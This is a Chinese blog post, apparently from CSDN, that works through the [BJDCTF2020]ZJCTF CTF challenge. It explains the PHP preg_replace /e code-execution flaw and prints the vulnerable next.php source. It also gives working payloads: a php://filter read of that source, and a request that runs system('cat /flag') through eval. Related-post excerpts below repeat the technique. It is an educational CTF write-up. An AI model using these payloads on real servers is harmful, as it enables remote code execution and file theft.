preg_replace 代码执行漏洞之[BJDCTF2020]ZJCTF,不过如此

最新推荐文章于 2024-04-23 02:47:28 发布
最新推荐文章于 2024-04-23 02:47:28 发布
阅读量263 收藏
点赞数
分类专栏: CTF知识点 文章标签: 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/125792561
版权

 知识点:

preg_replace /e 模式下的代码执行问题

 比如出现:

preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);

可以利用这个漏洞构造出命令执行漏洞; 具体

参考:Preg_Replace代码执行漏洞解析-CE安全网

 在这道题里面,首先使用php伪协议来构造参数:

text 使用data://text/plain,<内容>

file 使用file:php://filter/read=convert.base64-encode/resource=文件名来构造;

?file=php://filter/read=convert.base64-encode/resource=next.php&text=data://text/plain,I have a dream

 将得到的解码得到代码:

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {    
        return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}
foreach($_GET as $re => $str) {    
echo complex($re, $str). "\n";}
function getFlag(){	@eval($_GET['cmd']);
}

 构造:在next.php后

?\S*={${getFlag()}}&cmd=system('cat /flag')

其实应该先ls /

看到有flag列表,再打开;

 

一只Traveler
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
深入研究PHP中的preg_replace代码执行
10-18
主要给大家介绍了关于PHP中preg_replace代码执行的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
[BJDCTF2020]ZJCTF不过如此
chbeloved的博客
09-24 197
** [BJDCTF2020]ZJCTF不过如此 ** 给出了源码 file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪协议中的data://协议 源码中提示我们去包含next.php文件,所以我们利用php://filter协议去读下next.php的源码。 index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resour
深入研究preg_replace \e模式下的代码执行
paidx0
08-21 2779
深入研究preg_replace代码执行 下面将深入研究 preg_replace /e 模式下的代码执行问题, 其中包括 preg_replace 函数的执行过程分析、正则表达式分析、漏洞触发分析,当中的坑非常非常多,相信看完你也能学到很多 案例分析 <?php function complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")',
preg_replace在/e模式下的代码执行
最新发布
m0_59053674的博客
04-23 1181
preg_replace \e 模式存在代码执行如果 replacement中是双引号的,可引申出上面的漏洞将'strtolower("\\1")'修改为"strtolower('\\1')"​将'test("\1")' 修改为"test('\1')"这样{${phpinfo()}}或${phpinfo()}就会被当做一个普通的字符串处理(单引号中的变量不会被处理)tips:文章部分内容取材自网络,如有侵权请联系作者删除。
[BJDCTF 2020]ZJCTF不过如此
m0_70819573的博客
03-25 131
e模式下的preg_replace可以让第二个参数'替换字符串'当作代码执行,但是这里第二个参数是不可变的,但因为有这种特殊的情况,正则表达式模式或部分模式两边添加圆括号会将相关匹配存储到一个临时缓存区,并且从1开始排序,而strtolower("\1")正好表达的就是匹配区的第一个,从而我们如果匹配可以,则可以将函数实现。运用data伪协议写入数据,filter伪协议读取next.php源码内容。可值一提的是,在本地环境复现时,因为高版本的php已经废弃了改正则模式。是正则模式/ei的漏洞
preg_replace /e模式下代码漏洞
sGanYu
10-17 1141
<?php error_reporting(0); $text = $_GET["text"];//以get方式提交text $file = $_GET["file"];//以get方式提交file if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){//file_get_content需要读到一个$text传来的内容为I have a dream的文件 echo "<br>...
preg_replace与远程代码执行
m0_62422842的博客
04-01 3972
前言 之前在攻防世界上随便做了个题,发现了这个陌生的preg_replace函数\e情况下的漏洞。像我这种对这陌生的小白来说第一次理解是比较困难的。花了两天时间看了许多师傅的文章,这才理解。为此写下这篇文章总结一下,也希望后上路的小伙伴能看了我的文章能有所收获。 preg_replace函数 这个php函数是通过正则替换用的,基本形式为 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject ) pr
eregi_replace与preg_replace 函数代码的用法比较
10-30
eregi_replace与preg_replace 函数代码的用法比较
PHP正则替换函数preg_replacepreg_replace_callback使用总结
12-18
在编写PHP模板引擎工具类时,以前常用的一个正则替换函数为 preg_replace(),加上正则修饰符 /e,就能够执行强大的回调函数,实现模板引擎编译(其实就是字符串替换)。 详情介绍参考博文:PHP函数preg_replace() ...
慎用preg_replace危险的/e修饰符(一句话后门常用)
12-18
preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换...
preg_replace() /e代码执行漏洞
weixin_43749601的博客
01-30 4729
preg_replace() 函数 该函数执行一个正则表达式的搜索和替换。 语法 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。 参数说明: $pattern: 要搜索的模式,可以是字符串或一个字符串数组。 $replacem
[BJDCTF2020]ZJCTF不过如此--【Preg_Replace代码执行漏洞、正则表达式(详解)】
qq_43613772的博客
08-27 573
代码审计,发现要get传参text和file,而且text的内容包含I have a dream字段。flie为文件包含next.php. 构造payload: ?text=data://text/plain,I%20have%20a%20dream& file=php://filter/convert.base64-encode/resource=next.php base64解密得到next.php的源码: <?php $id = $_GET['id']; $_SESSION['id'
BUUCTF Web [GXYCTF2019]禁止套娃1 & [BJDCTF2020]ZJCTF不过如此1
网安小趴菜
09-20 404
BUUCTF Web [GXYCTF2019]禁止套娃1 & [BJDCTF2020]ZJCTF不过如此1
ctf php正则截断,记[BJDCTF2020]ZJCTF不过如此 关于php的正则匹配问题
weixin_42099942的博客
03-17 506
题目一上来就直接放出一段代码,那么话不多说,直接进行代码设计。error_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){echo "".file_get_contents($tex...
关于preg_replace \e的代码执行
m0_64815693的博客
04-23 1658
关于preg_replace \e的代码执行
sqli-labs通关全解---有关过滤的绕过--less23,25~28,32~37--8
cyynid的博客
01-12 857
preg_replace()用于sql注入防护中,主要是将一些疑似攻击的代码进行替换处理,从而使得他无法达到攻击的目的,例如将‘/’替换成空格,将union替换成空格等,但是由于攻击方式的多样化和程序员的疏忽,往往无法过滤掉所有的攻击,甚至可以对此类过滤进行绕过处理。返回在预定义字符之前添加反斜杠的字符串。即将预定义的字符进行转义提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。本文列举了一些对此类过滤方法的绕过手段,同样,也可以针对绕过手段,进行更加安全的过滤。
preg_replace_all
06-06
可能是您误解了 `preg_replace` 函数的作用。`preg_replace` 函数会在字符串中使用正则表达式进行替换,并返回替换后的字符串。如果要替换所有匹配项,可以使用 `preg_replace` 函数的第四个参数 `$count`,将其设置...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值